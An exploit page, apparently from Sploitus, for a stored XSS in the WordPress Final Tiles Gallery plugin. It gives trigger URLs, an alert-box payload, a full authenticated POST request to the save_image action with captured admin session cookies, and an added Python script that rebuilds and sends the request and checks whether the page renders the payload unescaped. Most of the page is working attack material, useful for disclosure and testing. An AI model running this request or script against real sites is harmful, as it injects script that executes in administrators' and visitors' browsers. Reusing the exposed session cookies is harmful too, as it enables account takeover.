## https://sploitus.com/exploit?id=WPEX-ID:10241
#XSS TRIGGER POINT: the payload fires when an admin or other authenticated user loads the gallery's admin page, or a post that embeds the gallery through the shortcode [FinalTilesGallery id='3'], e.g.:
https://[WP]/wp-admin/admin.php?page=ftg-lite-gallery-admin&id=2
https://[WP]/2020/05/13/site-review/


Add an image to a gallery from the plugin's admin page, then put the payload <script>alert(/XSS/)</script> in the image's Title and Caption fields. Both values are sent to the save_image AJAX action (the imageTitle and description parameters in the request below), stored without sanitisation, and echoed back unescaped wherever the gallery is rendered.

```http
POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://example.com/wp-admin/admin.php?page=ftg-lite-gallery-admin&id=2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 332
Origin: http://example.com
Connection: close
Cookie: wordpress_58dc4566418ddfdf24cf6b5640426bf6=admin%7C1590369568%7CvSHzpmLsv6Kmrqs3GIvTptVPrAKjmhvqSX3Y8xwwaoj%7C3ff5dbb79e29018c7866d9c1a371b372f43c22ff140dfd7b1c0fa68bda3d96ad; table_1=off; table_O-Z=on; table_2=off; table_I-Z=on; table_3=off; table_II-Z=on; table_4=off; table_III-Z=on; table_5=off; table_IV-Z=on; table_6=off; table_V-Z=on; table_7=off; table_VI-Z=on; table_8=off; table_VII-Z=on; table_9=off; table_VIII-Z=on; table_10=off; table_IX-Z=on; table_11=off; table_X-Z=on; table_12=off; table_XI-Z=on; wplcfirstsession=1; wfu_storage_QD1qfXa1PwpRDp11=C:Users; nc_sid=-xLya3FYncyYR9V_llTt; ftg_imglist_size=medium; wp-settings-1=libraryContent%3Dbrowse%26urlbutton%3Dnone%26posts_list_mode%3Dexcerpt%26uploader%3D1%26mfold%3Do; wp-settings-time-1=1589361159; wordpress_logged_in_58dc4566418ddfdf24cf6b5640426bf6=admin%7C1590369568%7CvSHzpmLsv6Kmrqs3GIvTptVPrAKjmhvqSX3Y8xwwaoj%7Cf1c7845d2c3b0856cfa559d0f5496afd2f03e7f519a0f26a3ede63fd8971759c; nc_sid=ta7RSzGrI-rVg-9hyzIk; advanced_ads_hide_deactivate_feedback=1; wplc_chat_status=5; _icl_current_language=en; nc_status=browsing; tcx_customerID=rJQlLlHFcU; wplc_cid=Bk4eLeHFcI_1589362760300; PHPSESSID=909kc73hdpc69l5vk6malipke7

source=images&action=save_image&FinalTiles_gallery=3ddb0e3aa2&img_url=http%3A%2F%2Ftarget%2Fwordpress%2Fwp-content%2Fuploads%2F2020%2F05%2Ftiki-5.jpg&imageTitle=%3Cscript%3Ealert(1111)%3C%2Fscript%3E&description=%3Cscript%3Ealert(2222)%3C%2Fscript%3E&alt=alttext&link=&target=&id=2&type=image&img_id=7&sortOrder=2&filters=&post_id=0
```
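The script below is an added example for this page, not code from the advisory or from the plugin. It rebuilds the save_image request body above field for field, sends it as the authenticated user, and classifies a fetched gallery or post page as "vulnerable" (the stored title comes back as a raw `<script>`), "escaped" (the title is HTML-encoded, i.e. the rendering has been fixed) or "absent". The nonce value in FinalTiles_gallery, the logged-in cookie header and the gallery/image ids are assumed to be obtained by the tester out of band; the page does not show how the plugin issues them.

```python
"""Reproduce and check the Final Tiles Gallery stored-XSS PoC above.

Added example for this page, not code from the advisory or from the plugin.
Assumptions (not stated on the page): the nonce in FinalTiles_gallery and a
valid logged-in cookie header are obtained out of band by the tester, and
the gallery/image ids match the PoC (gallery 2, image 7).
"""
import html
import urllib.request
from urllib.parse import quote, urlencode

# The two payloads from the PoC request body (imageTitle and description).
PAYLOAD_TITLE = "<script>alert(1111)</script>"
PAYLOAD_DESC = "<script>alert(2222)</script>"


def build_save_image_body(nonce, img_url, gallery_id=2, img_id=7,
                          title=PAYLOAD_TITLE, description=PAYLOAD_DESC):
    """Rebuild the admin-ajax.php save_image body field for field.

    quote() with safe="()" reproduces the PoC encoding exactly: '/' and ':'
    become %2F and %3A, while the parentheses in alert(...) stay literal.
    """
    fields = [
        ("source", "images"),
        ("action", "save_image"),
        ("FinalTiles_gallery", nonce),      # plugin nonce, taken from the admin page
        ("img_url", img_url),
        ("imageTitle", title),              # stored unsanitised -> stored XSS
        ("description", description),      # stored unsanitised -> stored XSS
        ("alt", "alttext"),
        ("link", ""),
        ("target", ""),
        ("id", str(gallery_id)),
        ("type", "image"),
        ("img_id", str(img_id)),
        ("sortOrder", "2"),
        ("filters", ""),
        ("post_id", "0"),
    ]
    return urlencode(fields, quote_via=quote, safe="()")


def send_save_image(base_url, cookie_header, body, gallery_id=2):
    """POST the body as the authenticated user; return (status, response text).

    This is the only network call in the file; base_url is e.g.
    "http://example.com". Content-Length is set by urllib from the body.
    """
    req = urllib.request.Request(
        f"{base_url}/wp-admin/admin-ajax.php?_fs_blog_admin=true",
        data=body.encode(),
        method="POST",
        headers={
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "X-Requested-With": "XMLHttpRequest",
            "Referer": f"{base_url}/wp-admin/admin.php?page=ftg-lite-gallery-admin&id={gallery_id}",
            "Cookie": cookie_header,
        },
    )
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.status, resp.read().decode("utf-8", errors="replace")


def classify_render(page_html, title=PAYLOAD_TITLE):
    """Decide from a fetched admin or post page how the stored title is rendered.

    "vulnerable": the payload appears raw, so it executes (the bug reported here).
    "escaped":    the payload appears HTML-encoded (what a fixed plugin should do).
    "absent":     the title was not rendered at all (e.g. the save failed).
    """
    if title in page_html:
        return "vulnerable"
    if html.escape(title, quote=False) in page_html:
        return "escaped"
    return "absent"


if __name__ == "__main__":
    # Offline demonstration with the PoC's own values; no request is sent.
    body = build_save_image_body(
        "3ddb0e3aa2",
        "http://target/wordpress/wp-content/uploads/2020/05/tiki-5.jpg")
    print(f"Content-Length: {len(body)}")
    print(body)
    # Constructed page fragments standing in for the gallery before and after a fix.
    print(classify_render('<div class="ftg-caption"><script>alert(1111)</script></div>'))
    print(classify_render('<div class="ftg-caption">&lt;script&gt;alert(1111)&lt;/script&gt;</div>'))
```

To run it against a test instance, call `send_save_image(base_url, cookie_header, body)` with a real nonce and cookie, then fetch the admin URL or the post listed under the trigger point and pass its HTML to `classify_render`; checking both locations matters because the admin page and the shortcode output are separate rendering paths and one may be fixed while the other is not.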